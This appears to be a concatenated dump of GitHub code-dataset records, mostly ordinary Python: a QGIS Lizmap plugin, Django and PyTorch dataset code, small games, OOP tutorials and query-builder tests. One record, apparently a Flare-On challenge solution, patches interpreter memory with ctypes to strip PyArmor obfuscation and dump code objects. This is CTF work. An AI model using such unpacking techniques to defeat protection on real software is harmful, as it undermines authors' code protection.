QgsServerOgcApi\n\nfrom lizmap_server.expression_service import ExpressionService\nfrom lizmap_server.get_feature_info import GetFeatureInfoFilter\nfrom lizmap_server.get_legend_graphic import GetLegendGraphicFilter\nfrom lizmap_server.legend_onoff_filter import LegendOnOffFilter\nfrom lizmap_server.lizmap_accesscontrol import LizmapAccessControlFilter\nfrom lizmap_server.lizmap_filter import LizmapFilter\nfrom lizmap_server.lizmap_service import LizmapService\nfrom lizmap_server.logger import Logger\nfrom lizmap_server.server_info_handler import ServerInfoHandler\nfrom lizmap_server.tools import check_environment_variable, version\n\n\nclass LizmapServer:\n \"\"\"Plugin for QGIS server\n this plugin loads Lizmap filter\"\"\"\n\n def __init__(self, server_iface: QgsServerInterface) -> None:\n self.server_iface = server_iface\n self.logger = Logger()\n self.version = version()\n self.logger.info('Init server version \"{}\"'.format(self.version))\n\n service_registry = server_iface.serviceRegistry()\n\n # Register API\n lizmap_api = QgsServerOgcApi(\n self.server_iface,\n '/lizmap',\n 'Lizmap',\n 'The Lizmap API endpoint',\n self.version)\n service_registry.registerApi(lizmap_api)\n lizmap_api.registerHandler(ServerInfoHandler())\n self.logger.info('API \"/lizmap\" loaded with the server info handler')\n\n check_environment_variable()\n\n # Register service\n try:\n service_registry.registerService(ExpressionService())\n except Exception as e:\n self.logger.critical('Error loading service \"expression\" : {}'.format(e))\n raise\n self.logger.info('Service \"expression\" loaded')\n\n try:\n service_registry.registerService(LizmapService(self.server_iface))\n except Exception as e:\n self.logger.critical('Error loading service \"lizmap\" : {}'.format(e))\n raise\n self.logger.info('Service \"lizmap\" loaded')\n\n try:\n server_iface.registerFilter(LizmapFilter(self.server_iface), 50)\n except Exception as e:\n self.logger.critical('Error loading filter \"lizmap\" : {}'.format(e))\n raise\n self.logger.info('Filter \"lizmap\" loaded')\n\n try:\n server_iface.registerAccessControl(LizmapAccessControlFilter(self.server_iface), 100)\n except Exception as e:\n self.logger.critical('Error loading access control \"lizmap\" : {}'.format(e))\n raise\n self.logger.info('Access control \"lizmap\" loaded')\n\n try:\n server_iface.registerFilter(GetFeatureInfoFilter(self.server_iface), 150)\n except Exception as e:\n self.logger.critical('Error loading filter \"get feature info\" : {}'.format(e))\n raise\n self.logger.info('Filter \"get feature info\" loaded')\n\n try:\n server_iface.registerFilter(GetLegendGraphicFilter(self.server_iface), 170)\n except Exception as e:\n self.logger.critical('Error loading filter \"get legend graphic\" : {}'.format(e))\n raise\n self.logger.info('Filter \"get legend graphic\" loaded')\n\n try:\n server_iface.registerFilter(LegendOnOffFilter(self.server_iface), 175)\n except Exception as e:\n self.logger.critical('Error loading filter \"legend on/off\" : {}'.format(e))\n raise\n self.logger.info('Filter \"legend on/off\" loaded')\n","repo_name":"NaturalGIS/qgis_server_and_lizmap_on_windows","sub_path":"webserver/plugins/lizmap_server/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"10444779108","text":"from rest_framework import serializers\n\nfrom apps.participants.models import VisumParticipant\nfrom apps.participants.models.enums import ParticipantType, PaymentStatus\nfrom apps.participants.serializers import InuitsParticipantSerializer\n\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass VisumParticipantSerializer(serializers.ModelSerializer):\n\n participant = InuitsParticipantSerializer()\n participant_type = serializers.ChoiceField(\n choices=ParticipantType.choices, default=ParticipantType.PARTICIPANT\n )\n payment_status = serializers.ChoiceField(\n choices=PaymentStatus.choices, default=PaymentStatus.NOT_PAYED\n )\n\n class Meta:\n model = VisumParticipant\n fields = \"__all__\"\n\n def to_internal_value(self, data: dict) -> dict:\n return super().to_internal_value(data)\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/participants/serializers/visum_participant_serializer.py","file_name":"visum_participant_serializer.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17446943260","text":"\"\"\"Реализует ячейку инвенторя\"\"\"\n\nfrom gameObject import *\nimport pygame\n\npygame.init()\n\nclass InvSlotObject(GameObject):\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.isFull = 0\n\n def setIsFull(self, isFull):\n self.isFull = isFull\n\n def setItem(self, item):\n self.item = item\n\n def drawItem(self, screen):\n w, h = self.item.image.get_size()\n a = self.x + self.width//2\n b = self.y + self.height//2\n x = a - w//2\n y = b - h//2\n screen.blit(self.item.image, (x, y))\n","repo_name":"Sentinel2502/goodendings","sub_path":"invSlotObject.py","file_name":"invSlotObject.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17451279538","text":"\n\n# Encapsulation : the process of binding data \n\n\n# private : \"__\"\n\n# ex 1 : private variables : we can accesss only with in the class\n\n\nclass A:\n __a = 10\n def disp(self):\n print(self.__a)\n \nobj = A()\nobj.disp()\n\n\n\nprint(obj.__a) # AttributeError: 'A' object has no attribute '__a'\n\n\n\n############################################\n\n# ex 2: private methods\n\n\n\nclass myclass():\n def __disp1(self):\n print(\"private method\")\n \n def disp2(self):\n print(\"this is disp2 calling disp1\")\n self.__disp1()\n \n\n\nc = myclass()\nc.disp2()\n\nc.__disp1() # AttributeError: 'myclass' object has no attribute '__disp1'\n\n\n\n\n###########################################\n\n# ex 3: \n\n \n \nclass emp:\n __eid=111\n \n def seteid(self,eid):\n self.__eid = eid\n \n def geteid(self):\n return self.__eid\n \ne = emp()\n\n# AttributeError: 'emp' object has no attribute '__eid'\n\nprint(e.geteid()) \n\ne.seteid(222)\n\nprint(e.geteid())\n\n\n\n\n\n\n####################################\n\n# ex 4 : problem : every method creat the object\n\n\n\n\nclass A:\n num1,num2 = 100,200\n \nclass B:\n def add(self):\n a = A()\n print(a.num1+a.num2)\n \n def mul(self):\n a = A()\n print(a.num1*a.num2)\n \nb = B()\nb.add()\nb.mul()\n\n\n###############################################\n\n# ex 5 : solution : one time creat the object use multiple times\n\n\n\n\n\nclass A:\n num1,num2 = 100,200\n \nclass B:\n \n a = A()\n \n def add(self):\n print(self.a.num1+self.a.num2)\n \n def mul(self):\n print(self.a.num1*self.a.num2)\n \nb = B()\nb.add()\nb.mul()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Kamesh-Mishra/Data_Science","sub_path":"Python/Python OOPS/oops_by_ratanIT_5.py","file_name":"oops_by_ratanIT_5.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27426681856","text":"from itertools import permutations\nimport copy\ndef solution(expression):\n answer = 0\n oper = set()\n temp = ''\n splitEx = []\n for i in expression:\n if(i=='-' or i=='+' or i=='*'):\n splitEx.append(temp)\n splitEx.append(i)\n oper.add(i)\n temp = ''\n continue\n temp += i\n splitEx.append(temp)\n\n result = 0\n for each in list(permutations(oper,len(oper))):\n # print(each)\n tempSplit = copy.deepcopy(splitEx)\n for operation in each:\n for idx,ex in enumerate(splitEx):\n if(ex==operation):\n preIdx, postIdx = idx-1,idx+1\n while tempSplit[preIdx] == '':\n preIdx -=1\n while tempSplit[postIdx] == '':\n postIdx +=1\n tempSplit[idx] = str(eval(tempSplit[preIdx]+ex+tempSplit[postIdx]))\n tempSplit[preIdx],tempSplit[postIdx] = '',''\n # print(tempSplit)\n\n result = max(result,abs(int(''.join(tempSplit))))\n # print(result)\n\n return result\n\nprint(solution(\"100-200*300-500+20\"\t))","repo_name":"dlckdduq1107/coding_test","sub_path":"Solutions/하루 한문제 코테준비/수식최대화_프로그래머스_67257.py","file_name":"수식최대화_프로그래머스_67257.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39458441224","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 8 15:43:45 2020\r\n\r\n@author: kowshikkrishna\r\n\r\nto use any of this features need to create a developer for twitter\r\n\"\"\"\r\n#program to automate some fn's in twitter\r\nimport tweepy\r\nimport time\r\n#use your own twitter account \r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_token, access_token_secret)\r\n\r\napi = tweepy.API(auth)\r\n\r\npublic_tweets = api.home_timeline()\r\n\r\ndef limit_error(cursor):\r\n try:\r\n while True:\r\n yield cursor.next()\r\n except tweepy.RateLimitError:\r\n time.sleep(2000)\r\n \r\ndef follow():\r\n #can follow or unfollow anyone from your followers list\r\n for follower in limit_error(tweepy.Cursor(api.followers).items()):\r\n if follower.name == 'followername':\r\n follower.follow()\r\n print('found')\r\n else:\r\n print('not found')\r\n\r\ndef like():\r\n#change the tweet object's function for any twitter function\r\n for tweet in limit_error(tweepy.Cursor(api.search, 'random').items(3)):\r\n try:\r\n tweet.favorite()\r\n print('liked')\r\n except tweepy.TweepError as e:\r\n print(e.reason)\r\n except StopIteration:\r\n break\r\n","repo_name":"Kowshikkrishna/twiiterbot","sub_path":"twitterbot.py","file_name":"twitterbot.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40607359060","text":"numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]\neven = []\nodd = []\nfor num in numbers:\n if num%2 == 0:\n even.append(num)\n else:\n odd.append(num) \nprint(even)\nprint(odd) ","repo_name":"asan99/backend-for-tasks","sub_path":"week2/task9/task9.py","file_name":"task9.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74720170085","text":"from random import *\r\n\r\ndef diapason():\r\n try:\r\n n1 = int(input('В радиусе от: '))\r\n n2 = int(input('До: '))\r\n except ValueError:\r\n print('Одно из ваших чисел не целое, попробуйте ещё раз.')\r\n return diapason()\r\n try:\r\n number = randint(n1, n2)\r\n except ValueError:\r\n print('Первое число должно быть больше второго, попробуйте ещё раз!')\r\n return diapason()\r\n print('Я заг��дал целое число, попробуй угадать какое!')\r\n guess_number(number, count)\r\ndef guess_number(number, count):\r\n try:\r\n user_number = int(input())\r\n except ValueError:\r\n print('Ваше число не целое, попробуйте еще разок')\r\n return guess_number(number, count)\r\n if user_number == number:\r\n count += 1\r\n if count == 1:\r\n print(f'Вы угадали, поздравляем! Вам понадобилась всего {count} попытка!')\r\n elif 2 <= count <= 4:\r\n print(f'Вы угадали, поздравляем! Вам понадобилось всего {count} попытки!')\r\n else:\r\n print(f'Вы угадали, поздравляем! Вам понадобилось всего {count} попыток!')\r\n while True:\r\n print('Хотите сыграть ещё раз?')\r\n print('Да/Нет')\r\n answer = input()\r\n if answer.lower() == 'да':\r\n print('Отлично, тогда играем ещё раз!')\r\n return diapason()\r\n elif answer.lower() == 'нет':\r\n print('Очень жаль. До встречи!')\r\n break\r\n else:\r\n print('Я не понимаю, введите значения \"Да\" или \"Нет\".')\r\n elif user_number < number:\r\n count += 1\r\n print('Слишком мало, попробуйте еще разок')\r\n return guess_number(number, count)\r\n elif user_number > number:\r\n count += 1\r\n print('Слишком много, попробуйте еще разок')\r\n return guess_number(number, count)\r\n\r\ncount = 0\r\nprint('Добро пожаловать в цифровую угадайку, введите числа, в радиусе которых будем загадывать!')\r\ndiapason()\r\n\r\n\r\n","repo_name":"izotikov/Izotikov","sub_path":"Guess_the_digit.py","file_name":"Guess_the_digit.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11890091901","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\ndatas = sorted(map(int,input().split()))\n\nopti =2e9+1\nresult = [0,0]\n\nstart = 0 # 탐색값의 오른쪽 데이터부터\nend = n-1 # 맨 끝열의 데이터가 초기 탐색범위\nwhile (start < end):\n sum = datas[start] + datas[end] #해당값을 더한 특성값\n if abs(sum) < opti: #그 절대값이 기존 값보다 작으면 그 값으로 업데이트\n opti = abs(sum)\n result = [start, end] # output을 위해 해당index 저장\n if sum < 0: # 음수면 0으로 향해야 하니 mid값을 더 오른 쪽으로 보내기 위해 start를 오른쪽으로\n start += 1\n elif sum == 0: #충족하면 바아로 정답 출력하고 중단\n print(datas[result[0]], datas[result[1]])\n sys.exit()\n elif sum > 0:\n end -=1\n \nprint(datas[result[0]], datas[result[1]])\n","repo_name":"saint6839/jungle-week-02","sub_path":"Week02/JinkyoJB/2470.py","file_name":"2470.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36731787109","text":"import sys, marshal, ctypes\ncount = 0\nfor frame in sys._current_frames().values():\t\n\twhile frame.f_back != None: \n\n\t\tcode_obj = frame.f_code\n\t\t\n\t\tif count == 2: \t\t\t# frame where code object is stored\n\t\t\tprint(\"Add of frame: \",hex(id(frame)))\n\t\t\tprint(\"Add of code_obj: \",hex(id(code_obj)))\n\t\t\tprint(\"Add of consts: \",hex(id(code_obj.co_consts)))\n\t\t\t#old_value = (*(code_obj.co_consts) - 0x7F38)^ current_time\n\t\t\tcurrent_co_consts = ctypes.c_longlong.from_address(id(code_obj.co_consts)) \n\n\t\t\tget_time = ctypes.c_longlong.from_address(0x000000006D709030) # adress of variable that store current_time\n\t\t\told_value = ctypes.c_longlong((current_co_consts.value - ctypes.c_longlong(0x7F38).value) ^ get_time.value)\n\t\t\tprint (\"current_co_consts: \", hex(current_co_consts.value))\n\t\t\tprint (\"time_as_key: \", hex(get_time.value))\n\t\t\tprint (\"old_value: \", hex(old_value.value))\n\t\t\tctypes.memmove(id(code_obj)+ 0x30, ctypes.byref(old_value), 8) # 0x30 is offset of co_consts in PyCodeObject\n\n\t\topen(\"code_obj.marshal\" + str(count), \"wb\").write(marshal.dumps(code_obj))\n\n\t\tcount += 1\n\t\tframe = frame.f_back \n\tcode_obj = frame.f_code\n\tbreak\n\nopen(\"code_obj.marshal\" + str(count), \"wb\").write(marshal.dumps(code_obj))\nopen(\"co_code\" + str(frame.f_lasti) + \"_\" + str(frame.f_lineno), \"wb\").write(marshal.dumps(code_obj.co_code))","repo_name":"0xChrisJL/FLARE-ON9-Chal11_Unpacking-Pyarmor","sub_path":"Code/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"36411101631","text":"import os\nimport sys\nimport json\n\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport cv2\nimport argparse\nfrom multiprocessing import Manager, Pool\n\n\nimport torch\nimport torch.utils.data as data\n\nfrom cs329s_waymo_object_detection.utils.image import annotations_to_df, process_resizing\nfrom cs329s_waymo_object_detection.utils.gcp_utils import download_blob, upload_blob\n\nfrom google.cloud import storage\n\n\ndef collate_fn(batch):\n return tuple(zip(*batch))\n\nclass WaymoDataset(data.Dataset):\n def __init__(self, mount_dir, gcp_annotations_path, cat_names, cat_ids, resize, area_limit, test_dataset=False):\n super(WaymoDataset, self).__init__()\n \n # filepaths\n self.gcp_annotations_path = gcp_annotations_path\n self.mount_dir = mount_dir\n\n self.dataset_name = self.gcp_annotations_path.split('/')[-1].replace('.json','')\n self.dataset_path = self.mount_dir +'/'.join(self.gcp_annotations_path.split('/')[:-2]) \n self.path_to_annotations = self.mount_dir + self.gcp_annotations_path\n self.path_to_processed_images = self.dataset_path+'/processed_images/'\n \n # high level summary values\n self.num_classes = len(cat_names)\n self.category_names = cat_names\n self.category_ids = cat_ids\n self.resize = resize\n self.area_limit = area_limit\n \n # multiprocessing for image transformations\n manager = Manager()\n self.shared_list = manager.list()\n \n \n # setup data directory\n print('Setting up data directories...')\n if os.path.exists(self.path_to_processed_images)==False:\n if test_dataset==False:\n os.mkdir(self.path_to_processed_images)\n\n # read annotations file\n f = open(self.path_to_annotations,'r')\n self.annotations = json.load(f)\n f.close()\n\n # convert annotations to dataframe\n print('Processing images...')\n image_map = {entry['id']:'/'+'/'.join(entry['gcp_url'].split('/')[3::]) for entry in self.annotations['images']}\n self.annotations_df = annotations_to_df(self.annotations, self.mount_dir, image_map)\n self.annotations_df['category_id'] = self.annotations_df['category_id'].apply(lambda x: 3 if x==4 else x) # map so categories are contiguous\n\n # Resize images to be the same size\n images = [x for x in self.annotations_df.image_id.unique() if int(x.split('_')[5])%5==0] # take every 15th frame from the segment\n pool = Pool()\n pool.map(self.process_image, images)\n pool.close()\n self.shared_list = [item for sublist in self.shared_list for item in sublist] #flatten\n self.annotations_df = pd.DataFrame(self.shared_list, columns = ['id','category_id','image_id','area','gcp_path',\n 'x_min','y_min','width','height','x_max','y_max'])\n self.annotations_df.to_csv('/'.join(self.path_to_annotations.split('/')[:-1]) + '/processed_annotations.csv', index=False)\n else:\n os.mkdir(self.path_to_processed_images)\n \n # read annotations file\n f = open(self.path_to_annotations,'r')\n self.annotations = json.load(f)\n f.close()\n \n image_map = {entry['id']:'/'+'/'.join(entry['gcp_url'].split('/')[3::]) for entry in self.annotations['images']}\n\n for entry in self.annotations['images']:\n img = cv2.imread(self.mount_dir + image_map[entry['id']])\n img_resized = cv2.resize(img, (self.resize[0], self.resize[1]), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(self.path_to_processed_images+entry['file_name'], img_resized)\n else:\n # read in annotations\n f = open(self.path_to_annotations,'r')\n self.annotations = json.load(f)\n f.close()\n self.annotations_df = pd.read_csv('/'.join(self.path_to_annotations.split('/')[:-1]) + '/processed_annotations.csv')\n\n # Drop bounding boxes which are too small\n self.annotations_df['area'] = (self.annotations_df['x_max'] - self.annotations_df['x_min'])*(self.annotations_df['y_max'] - self.annotations_df['y_min'])\n self.annotations_df = self.annotations_df[self.annotations_df['area']>self.area_limit]\n \n\n # Drop images without annotations\n self.annotations['images'] = [x for x in self.annotations['images'] if x['id'] in self.annotations_df['image_id'].unique()]\n self.annotations['images'] = [x for x in self.annotations['images'] if x['id'] in self.annotations_df['image_id'].unique()]\n \n \n def process_image(self, image):\n tmp_df = self.annotations_df[self.annotations_df['image_id']==image]\n img = cv2.imread(tmp_df['gcp_path'].unique()[0])\n img_resized = cv2.resize(img, (self.resize[0], self.resize[1]), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(self.path_to_processed_images+tmp_df['gcp_path'].unique()[0].split('/')[-1], img_resized)\n scale = np.flipud(np.divide(img_resized.shape[:-1], img.shape[:-1]))\n for index, row in tmp_df.iterrows():\n tmp_df.loc[index,['x_min','x_max']] *=scale[0]\n tmp_df.loc[index,['y_min','y_max']] *=scale[1]\n tmp_df.loc[index,'height'] = tmp_df.loc[index,'x_max'] - tmp_df.loc[index,'x_min']\n tmp_df.loc[index,'width'] = tmp_df.loc[index,'y_max'] - tmp_df.loc[index,'y_min']\n self.shared_list.append(tmp_df.values)\n \n \n def __getitem__(self, idx):\n image_id = self.annotations['images'][idx]['id']\n image_url = self.annotations['images'][idx]['gcp_url']\n filename = image_url.split('/')[-1]\n image = cv2.imread(self.path_to_processed_images+'{}'.format(filename))\n image = torch.tensor(image).permute(2,0,1).float() \n \n # define target data for fast rcnn\n temp_df = self.annotations_df[self.annotations_df['image_id']==image_id]\n\n boxes = []\n labels = []\n areas = []\n for _,item in temp_df.iterrows():\n boxes.append([item['x_min'],item['y_min'],item['x_max'],item['y_max']])\n labels.append(item['category_id'])\n areas.append(item['area'])\n \n boxes = torch.tensor(boxes, dtype=torch.int64)\n areas = torch.tensor(areas, dtype=torch.int64)\n labels = torch.tensor(labels, dtype=torch.int64)\n \n target = {}\n target[\"boxes\"] = boxes\n target[\"labels\"] = labels\n target[\"image_id\"] = torch.tensor(idx)\n target[\"area\"] = areas\n \n return image, target\n \n \n def __len__(self):\n return len(self.annotations['images'])","repo_name":"WeiHao97/cs329s-waymo-object-detection","sub_path":"cs329s_waymo_object_detection/datasets/waymo.py","file_name":"waymo.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12999622571","text":"class StringUtility:\n def __init__(self, string):\n self.string = string\n self.text = \"string\"\n\n def __str__(self):\n obj_string = str(self.string)\n return obj_string\n\n def vowels(self):\n string = self.string\n num_vowels = 0\n for char in string:\n if char in \"aeiouAEIOU\":\n num_vowels += 1\n if num_vowels >= 5:\n num_vowels = \"many\"\n return str(num_vowels)\n\n def bothEnds(self):\n string = self.string\n if len(string) <= 2:\n empty = \"\"\n return empty\n else:\n myString = \"\" + string[0] + string[1] + string[-2] + string[-1] \n return myString\n\n def fixStart(self):\n string = self.string\n if len(string) <= 1:\n return string\n else:\n first_char = string[0]\n string = string.replace(first_char, '*')\n string = first_char + string[1:]\n return string\n\n def asciiSum(self):\n string = self.string\n sum = 0\n for char in string:\n sum += ord(char)\n return sum\n\n def cipher(self):\n string = self.string\n cipher = \"\"\n for char in string:\n if char.isalpha():\n if char.isupper():\n alphabet = (ord(char) - 65 + len(self.string)) % (26)\n alphabet += 65\n if char.islower():\n alphabet = (ord(char) - 97 + len(self.string)) % (26)\n alphabet += 97\n new_char = chr(alphabet)\n else:\n new_char = char\n cipher += new_char\n return cipher\n","repo_name":"bucs110a0spring22/ch-8-lab-jdambra10","sub_path":"StringUtility.py","file_name":"StringUtility.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13318506108","text":"from datetime import date, datetime\nfrom typing import Any\n\nimport pytest\nfrom pydantic import BaseModel\n\nfrom motorhead import Clause, Document, Field, Q, Query, Queryable\nfrom motorhead import operator as op\n\n\n@pytest.fixture\ndef name_field() -> Field:\n return Field(name=\"name\")\n\n\nclass User(Document):\n name: str\n lucky_number: int\n\n\nQUser = Q(User)\n\n\nclass TestField:\n def test_field_name(self, *, name_field: Field) -> None:\n assert name_field.name == \"name\"\n\n def test_lt(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field < 42,\n operator=op.Lt,\n value=42,\n )\n\n def test_le(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field <= 42,\n operator=op.Lte,\n value=42,\n )\n\n @pytest.mark.parametrize(\n (\"value\", \"operator\"),\n (\n (\n (42, op.DirectEq),\n (3.14, op.DirectEq),\n (\"42\", op.DirectEq),\n (date.today(), op.DirectEq),\n (datetime.now(), op.DirectEq),\n ([], op.Eq),\n ([1, 2, 3], op.Eq),\n ((1, 2, 3), op.Eq),\n ({1, 2, 3}, op.Eq),\n ({1: 11, 2: 22, 3: 33}, op.Eq),\n )\n ),\n )\n def test_eq(self, *, name_field: Field, operator: type[op.KeyValueOperator], value: Any) -> None:\n self.assert_query_clause(\n name_field == value,\n operator=operator,\n value=value,\n )\n\n def test_ne(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field != 42,\n operator=op.Ne,\n value=42,\n )\n\n def test_gt(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field > 42,\n operator=op.Gt,\n value=42,\n )\n\n def test_ge(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field >= 42,\n operator=op.Gte,\n value=42,\n )\n\n def test_in(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field.In(42),\n operator=op.In,\n value=42,\n )\n\n def test_not_in(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field.NotIn(42),\n operator=op.NotIn,\n value=42,\n )\n\n def test_exists(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field.Exists(True),\n operator=op.Exists,\n value=True,\n )\n self.assert_query_clause(\n name_field.Exists(False),\n operator=op.Exists,\n value=False,\n )\n\n def test_all(self, *, name_field: Field) -> None:\n items = [1, 2, 3]\n self.assert_query_clause(\n name_field.All(items),\n operator=op.All,\n value=items,\n )\n\n def test_elem_match(self, *, name_field: Field) -> None:\n data = {\"one\": 2, \"two\": 4}\n self.assert_query_clause(\n name_field.ElemMatch(data),\n operator=op.ElemMatch,\n value=data,\n )\n\n def test_size(self, *, name_field: Field) -> None:\n self.assert_query_clause(\n name_field.Size(42),\n operator=op.Size,\n value=42,\n )\n\n @pytest.mark.parametrize((\"value\",), ((\"\",), (\"number\",), (\"string\",), (\"date\",)))\n def test_type(self, *, name_field: Field, value: str) -> None:\n self.assert_query_clause(\n name_field.Type(value),\n operator=op.Type,\n value=value,\n )\n\n def assert_query_clause(\n self, query: Any, *, operator: type[op.KeyValueOperator], field_name: str = \"name\", value: Any\n ) -> None:\n assert isinstance(query, Query)\n assert isinstance(query._clause, operator)\n assert query._clause.key == field_name\n assert query._clause.value == value\n\n\nclass TestQ:\n def test_result(self) -> None:\n assert not issubclass(QUser, Query)\n assert issubclass(QUser, Queryable)\n assert not issubclass(QUser, Document)\n assert not issubclass(QUser, BaseModel)\n\n def test_fields(self) -> None:\n assert \"id\" in User.model_fields\n assert \"name\" in User.model_fields\n assert \"lucky_number\" in User.model_fields\n\n for field_name in User.model_fields.keys():\n field = getattr(QUser, field_name)\n assert isinstance(field, Field)\n assert field.name == field_name if field_name != \"id\" else \"_id\"\n\n @pytest.mark.parametrize(\n (\"property_name\",),\n (\n # Not a complete list of BaseModel methods, just some important ones.\n (\"from_orm\",),\n (\"model_config\",),\n (\"model_fields\",),\n (\"model_dump\",),\n (\"model_copy\",),\n (\"model_dump\",),\n (\"model_dump_json\",),\n (\"model_dump_python\",),\n ),\n )\n def test_missing_basemodel_properties(self, *, property_name: str) -> None:\n assert not hasattr(QUser, property_name)\n\n\nclass TestQuery:\n def test_empty(self) -> None:\n query = Query()\n assert query._clause is None\n assert query.to_mongo() == {}\n\n @pytest.mark.parametrize(\n (\"clause\",),\n (\n (op.Eq(\"name\", \"what\"),),\n (op.And(op.Eq(\"name\", \"what\"), op.Or(op.Eq(\"name\", \"notwhat\"), op.Lt(\"lucky_number\", 10))),),\n ),\n )\n def test_clone(self, *, clause: Clause | None) -> None:\n base = Query(clause)\n clone = base.clone()\n\n assert clone is not base\n assert base._clause == clone._clause\n assert base.to_mongo() == clone.to_mongo()\n\n def test_and(self) -> None:\n q_empty = Query()\n q_1: Query = QUser.name == \"unknown\" # type: ignore[assignment]\n q_2: Query = QUser.lucky_number < 10 # type: ignore[assignment]\n\n empty_1 = q_empty & q_1\n assert isinstance(empty_1, Query)\n assert isinstance(empty_1._clause, op.DirectEq)\n assert empty_1._clause.key == \"name\"\n assert empty_1._clause.value == \"unknown\"\n\n empty_1_2 = empty_1 & q_2\n assert isinstance(empty_1_2, Query)\n assert isinstance(empty_1_2._clause, op.And)\n assert list(empty_1_2._clause.clauses) == [q_1._clause, q_2._clause]\n\n lte_clause = op.Gte(\"lucky_number\", 5)\n q_full = empty_1_2 & lte_clause\n assert isinstance(q_full, Query)\n assert isinstance(q_full._clause, op.And)\n assert list(q_full._clause.clauses) == [q_1._clause, q_2._clause, lte_clause]\n assert q_full.to_mongo() == {\n \"$and\": [\n {\"name\": \"unknown\"},\n {\"lucky_number\": {\"$lt\": 10}},\n {\"lucky_number\": {\"$gte\": 5}},\n ]\n }\n\n def test_or(self) -> None:\n q_empty = Query()\n q_1: Query = QUser.name == \"unknown\" # type: ignore[assignment]\n q_2: Query = QUser.lucky_number < 10 # type: ignore[assignment]\n\n empty_1 = q_empty | q_1\n assert isinstance(empty_1, Query)\n assert isinstance(empty_1._clause, op.DirectEq)\n assert empty_1._clause.key == \"name\"\n assert empty_1._clause.value == \"unknown\"\n\n empty_1_2 = empty_1 | q_2\n assert isinstance(empty_1_2, Query)\n assert isinstance(empty_1_2._clause, op.Or)\n assert list(empty_1_2._clause.clauses) == [q_1._clause, q_2._clause]\n\n lte_clause = op.Gte(\"lucky_number\", 5)\n q_full = empty_1_2 | lte_clause\n assert isinstance(q_full, Query)\n assert isinstance(q_full._clause, op.Or)\n assert list(q_full._clause.clauses) == [q_1._clause, q_2._clause, lte_clause]\n assert q_full.to_mongo() == {\n \"$or\": [\n {\"name\": \"unknown\"},\n {\"lucky_number\": {\"$lt\": 10}},\n {\"lucky_number\": {\"$gte\": 5}},\n ]\n }\n\n def test_and_or(self) -> None:\n q_1: Query = QUser.name == \"unknown\" # type: ignore[assignment]\n q_2: Query = QUser.lucky_number > 10 # type: ignore[assignment]\n q_3: Query = QUser.lucky_number < 0 # type: ignore[assignment]\n\n q_full = q_1 & (q_2 | q_3)\n assert isinstance(q_full, Query)\n assert isinstance(q_full._clause, op.And)\n assert q_full.to_mongo() == {\n \"$and\": [\n {\"name\": \"unknown\"},\n {\n \"$or\": [\n {\"lucky_number\": {\"$gt\": 10}},\n {\"lucky_number\": {\"$lt\": 0}},\n ]\n },\n ]\n }\n\n clone = q_full.clone()\n assert clone is not q_full\n assert clone.to_mongo() == q_full.to_mongo()\n\n def test_or_and(self) -> None:\n q_1: Query = QUser.name == \"unknown\" # type: ignore[assignment]\n q_2: Query = QUser.lucky_number < 10 # type: ignore[assignment]\n q_3: Query = QUser.lucky_number > 0 # type: ignore[assignment]\n\n q_full = q_1 | (q_2 & q_3)\n assert isinstance(q_full, Query)\n assert isinstance(q_full._clause, op.Or)\n assert q_full.to_mongo() == {\n \"$or\": [\n {\"name\": \"unknown\"},\n {\n \"$and\": [\n {\"lucky_number\": {\"$lt\": 10}},\n {\"lucky_number\": {\"$gt\": 0}},\n ]\n },\n ]\n }\n\n clone = q_full.clone()\n assert clone is not q_full\n assert clone.to_mongo() == 